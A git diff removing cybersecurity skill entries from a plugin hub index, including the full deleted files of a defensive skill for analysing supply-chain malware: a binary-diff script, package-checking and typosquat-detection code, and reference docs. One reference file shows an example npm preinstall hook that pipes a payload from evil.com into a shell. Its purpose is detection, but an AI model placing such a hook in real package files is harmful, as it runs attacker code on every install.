diff --git a/.flocks/flockshub/index.json b/.flocks/flockshub/index.json
index 14c60b732..1316944dd 100644
--- a/.flocks/flockshub/index.json
+++ b/.flocks/flockshub/index.json
@@ -1785,23 +1785,6 @@
       "riskLevel": "low",
       "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-slack-space-and-file-system-artifacts/manifest.json"
     },
-    {
-      "id": "analyzing-supply-chain-malware-artifacts",
-      "type": "skill",
-      "name": "analyzing-supply-chain-malware-artifacts",
-      "description": "Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines, and sideloaded dependencies to identify intrusion vectors and scope of compromise.",
-      "version": "1.0",
-      "category": "detection",
-      "tags": [
-        "hids"
-      ],
-      "useCases": [
-        "endpoint-forensics"
-      ],
-      "trust": "community",
-      "riskLevel": "low",
-      "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/manifest.json"
-    },
     {
       "id": "analyzing-threat-actor-ttps-with-mitre-attack",
       "type": "skill",
@@ -4563,23 +4546,6 @@
       "riskLevel": "low",
       "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-attacks-on-endpoints/manifest.json"
     },
-    {
-      "id": "detecting-fileless-malware-techniques",
-      "type": "skill",
-      "name": "detecting-fileless-malware-techniques",
-      "description": "Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.",
-      "version": "1.0.0",
-      "category": "detection",
-      "tags": [
-        "windows"
-      ],
-      "useCases": [
-        "endpoint-forensics"
-      ],
-      "trust": "community",
-      "riskLevel": "low",
-      "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/manifest.json"
-    },
     {
       "id": "detecting-golden-ticket-attacks-in-kerberos-logs",
       "type": "skill",
@@ -6447,25 +6413,6 @@
       "riskLevel": "low",
       "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/hunting-credential-stuffing-attacks/manifest.json"
     },
-    {
-      "id": "hunting-for-anomalous-powershell-execution",
-      "type": "skill",
-      "name": "hunting-for-anomalous-powershell-execution",
-      "description": "Hunt for malicious PowerShell activity by analyzing Script Block Logging (Event 4104), Module Logging (Event 4103), and process creation events. The analyst parses Windows Event Log EVTX files to detect obfuscated commands, AMSI bypass attempts, encoded payloads, credential dumping keywords, and suspicious download cradles. Activates for requests involving PowerShell threat hunting, script block analysis, encoded command detection, or AMSI bypass identification.",
-      "version": "1.0",
-      "category": "detection",
-      "tags": [
-        "iam",
-        "windows",
-        "ioc"
-      ],
-      "useCases": [
-        "log-analysis"
-      ],
-      "trust": "community",
-      "riskLevel": "low",
-      "manifestPath": "plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/manifest.json"
-    },
     {
       "id": "hunting-for-beaconing-with-frequency-analysis",
       "type": "skill",
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/LICENSE b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/LICENSE
deleted file mode 100644
index d8851182d..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/LICENSE
+++ /dev/null
@@ -1,201 +0,0 @@
-
-                                 Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to the Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by the Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding any notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. Please do not remove or change
-      the license header comment from a contributed file except when
-      necessary.
-
-   Copyright 2026 mukul975
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/SKILL.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/SKILL.md
deleted file mode 100644
index b92ecfeba..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/SKILL.md
+++ /dev/null
@@ -1,167 +0,0 @@
----
-name: analyzing-supply-chain-malware-artifacts
-description: Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines,
-  and sideloaded dependencies to identify intrusion vectors and scope of compromise.
-domain: cybersecurity
-subdomain: malware-analysis
-tags:
-- supply-chain
-- malware-analysis
-- trojanized-software
-- solarwinds
-- 3cx
-- dependency-confusion
-- software-integrity
-version: '1.0'
-author: mahipal
-license: Apache-2.0
-atlas_techniques:
-- AML.T0010
-- AML.T0104
-nist_ai_rmf:
-- GOVERN-5.2
-- MAP-1.6
-- MANAGE-2.2
-d3fend_techniques:
-- Platform Hardening
-- Hardware Component Inventory
-- Restore Object
-- Electromagnetic Radiation Hardening
-- RF Shielding
-nist_csf:
-- DE.AE-02
-- RS.AN-03
-- ID.RA-01
-- DE.CM-01
----
-# Analyzing Supply Chain Malware Artifacts
-
-## Overview
-
-Supply chain attacks compromise legitimate software distribution channels to deliver malware through trusted update mechanisms. Notable examples include SolarWinds SUNBURST (2020, affecting 18,000+ customers), 3CX SmoothOperator (2023, a cascading supply chain attack originating from Trading Technologies), and numerous npm/PyPI package poisoning campaigns. Analysis involves comparing trojanized binaries against legitimate versions, identifying injected code in build artifacts, examining code signing anomalies, and tracing the infection chain from initial compromise through payload delivery. As of 2025, supply chain attacks account for 30% of all breaches, a 100% increase from prior years.
-
-
-## When to Use
-
-- When investigating security incidents that require analyzing supply chain malware artifacts
-- When building detection rules or threat hunting queries for this domain
-- When SOC analysts need structured procedures for this analysis type
-- When validating security monitoring coverage for related attack techniques
-
-## Prerequisites
-
-- Python 3.9+ with `pefile`, `ssdeep`, `hashlib`
-- Binary diff tools (BinDiff, Diaphora)
-- Code signing verification tools (sigcheck, codesign)
-- Software composition analysis (SCA) tools
-- Access to legitimate software versions for comparison
-- Package repository monitoring (npm, PyPI, NuGet)
-
-## Workflow
-
-### Step 1: Binary Comparison Analysis
-
-```python
-#!/usr/bin/env python3
-"""Compare trojanized binary against legitimate version."""
-import hashlib
-import pefile
-import sys
-import json
-
-
-def compare_pe_files(legitimate_path, suspect_path):
-    """Compare PE file structures between legitimate and suspect versions."""
-    legit_pe = pefile.PE(legitimate_path)
-    suspect_pe = pefile.PE(suspect_path)
-
-    report = {"differences": [], "suspicious_sections": [], "import_changes": []}
-
-    # Compare sections
-    legit_sections = {s.Name.rstrip(b'\x00').decode(): {
-        "size": s.SizeOfRawData,
-        "entropy": s.get_entropy(),
-        "characteristics": s.Characteristics,
-    } for s in legit_pe.sections}
-
-    suspect_sections = {s.Name.rstrip(b'\x00').decode(): {
-        "size": s.SizeOfRawData,
-        "entropy": s.get_entropy(),
-        "characteristics": s.Characteristics,
-    } for s in suspect_pe.sections}
-
-    # Find new or modified sections
-    for name, props in suspect_sections.items():
-        if name not in legit_sections:
-            report["suspicious_sections"].append({
-                "name": name, "reason": "New section not in legitimate version",
-                "size": props["size"], "entropy": round(props["entropy"], 2),
-            })
-        elif abs(props["size"] - legit_sections[name]["size"]) > 1024:
-            report["suspicious_sections"].append({
-                "name": name, "reason": "Section size significantly changed",
-                "legit_size": legit_sections[name]["size"],
-                "suspect_size": props["size"],
-            })
-
-    # Compare imports
-    legit_imports = set()
-    if hasattr(legit_pe, 'DIRECTORY_ENTRY_IMPORT'):
-        for entry in legit_pe.DIRECTORY_ENTRY_IMPORT:
-            for imp in entry.imports:
-                if imp.name:
-                    legit_imports.add(f"{entry.dll.decode()}!{imp.name.decode()}")
-
-    suspect_imports = set()
-    if hasattr(suspect_pe, 'DIRECTORY_ENTRY_IMPORT'):
-        for entry in suspect_pe.DIRECTORY_ENTRY_IMPORT:
-            for imp in entry.imports:
-                if imp.name:
-                    suspect_imports.add(f"{entry.dll.decode()}!{imp.name.decode()}")
-
-    new_imports = suspect_imports - legit_imports
-    if new_imports:
-        report["import_changes"] = list(new_imports)
-
-    # Check code signing
-    report["legit_signed"] = bool(legit_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)
-    report["suspect_signed"] = bool(suspect_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)
-
-    return report
-
-
-def hash_file(filepath):
-    """Calculate multiple hashes for a file."""
-    hashes = {}
-    with open(filepath, 'rb') as f:
-        data = f.read()
-    for algo in ['md5', 'sha1', 'sha256']:
-        h = hashlib.new(algo)
-        h.update(data)
-        hashes[algo] = h.hexdigest()
-    return hashes
-
-
-if __name__ == "__main__":
-    if len(sys.argv) < 3:
-        print(f"Usage: {sys.argv[0]} <legitimate_binary> <suspect_binary>")
-        sys.exit(1)
-    report = compare_pe_files(sys.argv[1], sys.argv[2])
-    print(json.dumps(report, indent=2))
-```
-
-## Validation Criteria
-
-- Trojanized components identified through binary diffing
-- Injected code isolated and analyzed separately
-- Code signing anomalies documented
-- Infection timeline reconstructed from build artifacts
-- Downstream impact scope assessed across affected systems
-- IOCs extracted for detection and blocking
-
-## References
-
-- [ReversingLabs - 3CX Supply Chain Analysis](https://www.reversinglabs.com/blog/what-went-wrong-with-the-3cx-software-supply-chain-attack-and-how-it-could-have-been-prevented)
-- [Fortinet - SolarWinds Supply Chain Attack](https://www.fortinet.com/resources/cyberglossary/solarwinds-cyber-attack)
-- [Picus - 3CX SmoothOperator Analysis](https://www.picussecurity.com/resource/blog/smoothoperator-analysis-of-3cxdesktopapp-supply-chain-attack)
-- [MITRE ATT&CK T1195 - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/assets/template.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/assets/template.md
deleted file mode 100644
index b83d9a787..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/assets/template.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Analysis Report Template - analyzing-supply-chain-malware-artifacts
-
-## Sample Information
-| Field | Value |
-|-------|-------|
-| SHA-256 | |
-| File Type | |
-| Analysis Date | |
-| Analyst | |
-| Classification | TLP:AMBER |
-
-## Findings
-| Finding | Severity | Details |
-|---------|----------|---------|
-| | | |
-
-## IOCs Extracted
-| Type | Value | Context |
-|------|-------|---------|
-| | | |
-
-## Recommendations
-1.
-2.
-3.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/manifest.json b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/manifest.json
deleted file mode 100644
index fde0125ef..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/manifest.json
+++ /dev/null
@@ -1,63 +0,0 @@
-{
-  "schemaVersion": "hub.plugin.v1",
-  "id": "analyzing-supply-chain-malware-artifacts",
-  "type": "skill",
-  "name": "analyzing-supply-chain-malware-artifacts",
-  "description": "Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines, and sideloaded dependencies to identify intrusion vectors and scope of compromise.",
-  "version": "1.0",
-  "author": "mahipal",
-  "license": "Apache-2.0",
-  "homepage": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
-  "category": "detection",
-  "tags": [
-    "hids"
-  ],
-  "useCases": [
-    "endpoint-forensics"
-  ],
-  "domains": [
-    "security-ops"
-  ],
-  "capabilities": [
-    "llm-agent",
-    "file-analysis"
-  ],
-  "trust": "community",
-  "source": {
-    "kind": "bundled",
-    "path": ".flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts"
-  },
-  "compatibility": {
-    "flocks": ">=0.8.0",
-    "os": [
-      "darwin",
-      "linux",
-      "windows"
-    ]
-  },
-  "dependencies": {
-    "skills": [],
-    "tools": [],
-    "python": [],
-    "external": []
-  },
-  "permissions": {
-    "tools": [],
-    "network": false,
-    "shell": false,
-    "filesystem": "read"
-  },
-  "risk": {
-    "level": "low",
-    "reasons": []
-  },
-  "entrypoints": [
-    "SKILL.md"
-  ],
-  "checksums": {},
-  "upstream": {
-    "name": "mukul975/Anthropic-Cybersecurity-Skills",
-    "url": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
-  },
-  "sourceNotice": "Source: This skill is adapted from the open-source project https://github.com/mukul975/Anthropic-Cybersecurity-Skills."
-}
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md
deleted file mode 100644
index 932dc27db..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# API Reference: Supply Chain Malware Analysis
-
-## npm Registry API
-
-### Package Metadata
-```bash
-curl https://registry.npmjs.org/<package-name>
-curl https://registry.npmjs.org/<package-name>/<version>
-```
-
-### Response Fields
-| Field | Description |
-|-------|-------------|
-| `dist-tags.latest` | Latest version |
-| `versions` | All published versions |
-| `maintainers` | Package maintainers |
-| `time.created` | First publish date |
-| `time.modified` | Last modification |
-
-## PyPI JSON API
-
-### Package Info
-```bash
-curl https://pypi.org/pypi/<package-name>/json
-```
-
-### Key Fields
-| Field | Description |
-|-------|-------------|
-| `info.author` | Package author |
-| `info.version` | Current version |
-| `releases` | All versions with artifacts |
-| `info.project_urls` | Source code links |
-
-## Socket.dev - Supply Chain Analysis
-
-### npm Audit
-```bash
-socket npm audit
-socket npm info <package>
-```
-
-## Suspicious Package Indicators
-
-| Indicator | Severity | Description |
-|-----------|----------|-------------|
-| preinstall/postinstall hooks | HIGH | Code runs during npm install |
-| URL/git dependencies | HIGH | Dependencies from non-registry source |
-| eval/exec in setup.py | HIGH | Dynamic code execution during pip install |
-| Base64 in install scripts | HIGH | Obfuscated payload |
-| Recently created package | MEDIUM | New package mimicking popular name |
-| Single maintainer | LOW | Bus factor risk |
-
-## Sigstore/cosign Verification
-
-### Verify Container Image
-```bash
-cosign verify --certificate-identity-regexp=".*" \
-  --certificate-oidc-issuer-regexp=".*" image:tag
-```
-
-### Verify Artifact
-```bash
-cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
-```
-
-## SLSA Framework Levels
-
-| Level | Requirement |
-|-------|-------------|
-| SLSA 1 | Build provenance exists |
-| SLSA 2 | Hosted build platform, authenticated provenance |
-| SLSA 3 | Hardened build platform, non-falsifiable provenance |
-| SLSA 4 | Two-party review, hermetic builds |
-
-## npm install Hook Risks
-```json
-{
-  "scripts": {
-    "preinstall": "curl evil.com/payload | sh",
-    "postinstall": "node ./install.js",
-    "preuninstall": "node cleanup.js"
-  }
-}
-```
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/standards.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/standards.md
deleted file mode 100644
index 9f52eede4..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/standards.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# Standards Reference - analyzing-supply-chain-malware-artifacts
-
-## Applicable Standards
-- MITRE ATT&CK Framework
-- NIST SP 800-83 Guide to Malware Incident Prevention
-- NIST SP 800-86 Guide to Integrating Forensic Techniques
-
-## Related MITRE ATT&CK Techniques
-See SKILL.md for specific technique mappings.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/workflows.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/workflows.md
deleted file mode 100644
index acf86d044..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/references/workflows.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# Analysis Workflows - analyzing-supply-chain-malware-artifacts
-
-## Primary Workflow
-```
-[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
-                                                                          |
-                                                                          v
-                                                                 [Report Generation]
-```
-
-See SKILL.md for detailed step-by-step procedures.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/scripts/agent.py b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/scripts/agent.py
deleted file mode 100644
index 91492772c..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/analyzing-supply-chain-malware-artifacts/scripts/agent.py
+++ /dev/null
@@ -1,164 +0,0 @@
-#!/usr/bin/env python3
-"""Supply chain malware artifact analysis agent.
-
-Analyzes software supply chain compromise indicators including package
-integrity, build pipeline artifacts, dependency confusion, and trojanized updates.
-"""
-
-import os
-import sys
-import json
-import hashlib
-import re
-import subprocess
-from datetime import datetime
-
-try:
-    import requests
-    HAS_REQUESTS = True
-except ImportError:
-    HAS_REQUESTS = False
-
-
-def compute_hash(filepath):
-    hashes = {}
-    for algo in ("md5", "sha1", "sha256"):
-        h = hashlib.new(algo)
-        with open(filepath, "rb") as f:
-            for chunk in iter(lambda: f.read(65536), b""):
-                h.update(chunk)
-        hashes[algo] = h.hexdigest()
-    return hashes
-
-
-def check_npm_package(package_name):
-    if not HAS_REQUESTS:
-        return {"error": "requests not installed"}
-    url = f"https://registry.npmjs.org/{package_name}"
-    try:
-        resp = requests.get(url, timeout=15)
-        resp.raise_for_status()
-        data = resp.json()
-        latest = data.get("dist-tags", {}).get("latest", "")
-        versions = list(data.get("versions", {}).keys())
-        maintainers = data.get("maintainers", [])
-        return {
-            "name": package_name, "latest": latest,
-            "version_count": len(versions),
-            "maintainers": [m.get("name") for m in maintainers],
-        }
-    except requests.RequestException as e:
-        return {"error": str(e)}
-
-
-def check_pypi_package(package_name):
-    if not HAS_REQUESTS:
-        return {"error": "requests not installed"}
-    url = f"https://pypi.org/pypi/{package_name}/json"
-    try:
-        resp = requests.get(url, timeout=15)
-        resp.raise_for_status()
-        data = resp.json()
-        info = data.get("info", {})
-        return {
-            "name": info.get("name"), "version": info.get("version"),
-            "author": info.get("author"),
-            "release_count": len(data.get("releases", {})),
-        }
-    except requests.RequestException as e:
-        return {"error": str(e)}
-
-
-def detect_typosquat_packages(target_name):
-    permutations = set()
-    for i in range(len(target_name)):
-        permutations.add(target_name[:i] + target_name[i+1:])
-    for i in range(len(target_name) - 1):
-        swapped = list(target_name)
-        swapped[i], swapped[i+1] = swapped[i+1], swapped[i]
-        permutations.add("".join(swapped))
-    permutations.add(target_name.replace("-", "_"))
-    permutations.add(target_name.replace("_", "-"))
-    permutations.discard(target_name)
-    return sorted(permutations)
-
-
-def analyze_package_scripts(package_json_path):
-    with open(package_json_path, "r") as f:
-        pkg = json.load(f)
-    findings = []
-    scripts = pkg.get("scripts", {})
-    for hook in ["preinstall", "postinstall", "preuninstall"]:
-        if hook in scripts:
-            cmd = scripts[hook]
-            findings.append({
-                "type": "install_hook", "hook": hook, "command": cmd[:200],
-                "severity": "HIGH" if any(s in cmd.lower() for s in
-                    ["curl", "wget", "eval", "exec", "base64"]) else "MEDIUM",
-            })
-    deps = {**pkg.get("dependencies", {}), **pkg.get("devDependencies", {})}
-    for dep, ver in deps.items():
-        if ver.startswith("http") or ver.startswith("git"):
-            findings.append({
-                "type": "url_dependency", "package": dep,
-                "source": ver[:200], "severity": "HIGH",
-            })
-    return {"name": pkg.get("name"), "findings": findings}
-
-
-def analyze_python_setup(setup_py_path):
-    with open(setup_py_path, "r") as f:
-        content = f.read()
-    findings = []
-    patterns = [
-        (r"os\.system\(", "os.system() execution"),
-        (r"subprocess\.", "subprocess execution"),
-        (r"exec\(", "exec() code execution"),
-        (r"eval\(", "eval() code execution"),
-        (r"base64\.b64decode", "Base64 decoding"),
-        (r"socket\.", "Network socket usage"),
-    ]
-    for pattern, description in patterns:
-        if re.search(pattern, content):
-            findings.append({
-                "type": "suspicious_setup_code",
-                "pattern": description, "severity": "HIGH",
-            })
-    return {"file": setup_py_path, "findings": findings}
-
-
-if __name__ == "__main__":
-    print("=" * 60)
-    print("Supply Chain Malware Artifact Analysis Agent")
-    print("Package integrity, typosquat detection, install hook analysis")
-    print("=" * 60)
-
-    target = sys.argv[1] if len(sys.argv) > 1 else None
-    if not target:
-        print("\n[DEMO] Usage:")
-        print("  python agent.py <package.json>         # Analyze npm package")
-        print("  python agent.py npm:<package_name>     # Check npm registry")
-        print("  python agent.py pypi:<package_name>    # Check PyPI registry")
-        sys.exit(0)
-
-    if target.startswith("npm:"):
-        pkg_name = target[4:]
-        print(f"\n[*] Checking npm: {pkg_name}")
-        info = check_npm_package(pkg_name)
-        typos = detect_typosquat_packages(pkg_name)
-        print(json.dumps(info, indent=2))
-        print(f"\n  Potential typosquats: {typos[:10]}")
-    elif target.startswith("pypi:"):
-        pkg_name = target[5:]
-        print(f"\n[*] Checking PyPI: {pkg_name}")
-        info = check_pypi_package(pkg_name)
-        print(json.dumps(info, indent=2))
-    elif os.path.exists(target):
-        basename = os.path.basename(target)
-        if basename == "package.json":
-            result = analyze_package_scripts(target)
-        elif basename == "setup.py":
-            result = analyze_python_setup(target)
-        else:
-            result = {"file": target, "hashes": compute_hash(target)}
-        print(json.dumps(result, indent=2))
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/LICENSE b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/LICENSE
deleted file mode 100644
index d8851182d..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/detecting-fileless-malware-techniques/LICENSE
+++ /dev/null
@@ -1,201 +0,0 @@
-
-                                 Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
